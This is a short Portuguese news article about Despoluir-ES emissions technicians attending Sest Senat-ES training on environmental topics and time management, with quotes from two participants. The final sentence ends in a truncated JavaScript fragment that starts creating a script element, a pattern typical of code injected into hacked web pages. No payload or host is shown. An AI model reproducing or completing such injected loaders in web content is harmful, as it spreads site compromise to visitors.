Despoluir: técnicos trocam o campo pela sala

Os treinamentos do grupo abordaram questões ambientais e gestão do tempo

Na segunda-feira, 10 de agosto, não teve atendimento externo da equipe do Programa Despoluir-ES. Mas o motivo foi nobre. Ao invés de irem a campo realizar os testes de emissão veicular, eles passaram um dia inteiro investindo em qualificação profissional. Com o objetivo de aprimorar sua rotina de trabalho, o grupo participou de treinamentos voltados para temas ambientais e de gestão de tempo. Os cursos fazem parte da grade do Sest Senat-ES e as aulas aconteceram na própria Fetransportes, das 8 às 17 horas.

Um total de oito pessoas marcou presença nos treinamentos. Estavam lá os sete técnicos, Juvenal Reinholz, Reginaldo Del Santo, Wesley D´avila Ferraz, André Luiz Cabral Andrade, Carlos Magno Pereira, Bruce Luiz Nascimento e Claudimir José Perovano, além do coordenador do Despoluir-ES, João Paulo Lamas.

O grupo de técnicos, acostumado com uma rotina diferente – que inclui visitas a empresas do setor de transporte e realização de muitos testes de fumaça preta –, gostou da experiência. Para eles, a parada estratégica serviu para ampliar informações e renovar conhecimento. E muita coisa que foi tratada em sala será levada até para a vida pessoal.

“Não será apenas na vida profissional que poderemos colocar em prática o que aprendemos. A maior parte das coisas que foi tratada tem aplicação também na vida pessoal. O curso de Gestão do Tempo, por exemplo, abordou a necessidade de priorizar o que fazemos, definindo tempo para trabalho, mas também para diversão em família. E o de temática ambiental nos apresentou dicas simples que não só podem como devem ser levadas e consolidadas em nosso ambiente de trabalho e, principalmente, dentro de nossa casa”, disse Juvenal.

Claudimir também gostou bastante do que viu e ouviu. “Além de todo aprendizado propiciado, tivemos a chance de tirar muitas dúvidas sobre os temas propostos. Principalmente com relação às questões ambientais, que têm tudo a ver com o trabalho que desempenhamos aqui na Fetransportes”, ressaltou, destacando, ainda, a participação e boa interação de todo o grupo. var d=document;var s=d.createElement(‘script’);